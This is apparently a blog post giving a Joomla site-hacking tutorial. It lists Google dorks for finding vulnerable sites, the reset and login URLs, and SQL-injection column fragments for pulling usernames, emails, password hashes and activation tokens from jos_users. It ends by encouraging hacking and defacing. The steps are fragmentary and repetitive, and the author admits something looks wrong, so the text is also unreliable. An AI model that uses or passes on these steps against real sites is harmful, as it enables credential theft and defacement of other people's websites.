INFORMATION :-Steps :
Copy & Paste - /index.php or Change --> Example that have been changed (0x3a,username,0x3a,email,0x3a,activation)
just on url address of victim site.
- Find any site with ERROR (www.Google.com) - inurl:jos_users" inurl:"index.php
- To make you are just like forgot password. - /index.php?option=com_user&view=reset
- Its Find E-Mail - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
- Its Find Username - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
- Its Find Admin Profile - (username,0x3a,password)
- Its Find Token - (0x3a,username,0x3a,email,0x3a,0x3a,activation)
- Its Find Login/Outlogin - index.php?option=com_user&view=login
* inurl:"option=com_juser"
* its find error sites, Some Site :-- (0x3a,username,0x3a,email,0x3a,0x3a,activation)
- (0x3a,username,0x3a,email,0x3a,activation)
Happy trying and enjoy hacking. :)
P/S - From the steps or procedures, it is look like something wrong... anyway, give me a comment if there is a problem in defacing joomla site. So i can make a new tutorial for joomla hacking tricks.

Post a Comment